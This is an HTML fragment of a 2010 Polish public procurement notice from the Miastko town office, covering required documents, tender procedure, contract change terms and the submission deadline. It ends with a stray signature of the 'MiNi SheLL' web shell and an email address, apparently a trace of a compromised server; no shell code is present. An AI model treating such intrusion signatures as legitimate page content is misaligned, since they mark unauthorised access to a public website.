<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dowód wniesienia wadium: a) jeżeli wniesiono w pieniądzu - do oferty zaleca się dołączyć dowód zrealizowania przelewu w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę; b) jeżeli wniesiono w innej dopuszczalnej formie - do oferty należy dołączyć oryginał właściwego dokumentu; 2. pełnomocnictwo osób/y uprawnionej do reprezentowania firmy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze handlowym lub w innym dokumencie, właściwym dla formy organizacyjnej firmy Wykonawcy o ile nie wynika to z innych dokumentów załączonych do oferty; 3. dokument, w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. na podstawie umowy konsorcjalnej, działalności prowadzonej w formie spółki cywilnej) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, z którego wynika, że zostało ono udzielone przez każdego z Nich (podpisany przez wszystkich wykonawców) - w formie oryginału, w przypadku wyboru oferty tych Wykonawców, Zamawiający przed zawarciem umowy ws. zamówienia publicznego będzie żądał umowę regulującą ich współpracę; 4. wskazanie części zamówienia, której wykonanie Wykonawca zamierza powierzyć Podwykonawcom; 5. dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. zmiany osób sprawujących czynności określone w §5 ust. 2 umowy i wskazanych w ofercie na uzasadniony wniosek wykonawcy zaakceptowany przez Zamawiającego lub na żądanie Zamawiającego jeżeli nie wywiązują się one z nałożonych obowiązków;
2. przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest:
a) wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca żadnej odpowiedzialności;
b) na przedłużenie terminu realizacji projektu z przyczyn obecnie niemożliwych do określenia,
c) wykopaliskami uniemożliwiającymi wykonywanie robót;
d) szczególnie niesprzyjającymi warunkami atmosferycznymi;
e) koniecznością dokonania istotnych zmian  w dokumentacji projektowej na wniosek stron;
f) wystąpieniem siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Miastku, ul. Grunwaldzka 1, 77-200 Miastko pokój nr 17. Płatność 10,00 PLN (brutto) - dotyczy wersji papierowej przekazywanej na wniosek wykonawcy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2010 godzina 12:00, miejsce: Urzędzie Miejskim w Miastku, ul. Grunwaldzka 1, 77-200 Miastko p. nr 19 ( I piętro -sekretariat burmistrza). Otwarcie ofert nastąpi w dniu 10 maja 2010r. o godz. 12:15 pokój nr 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com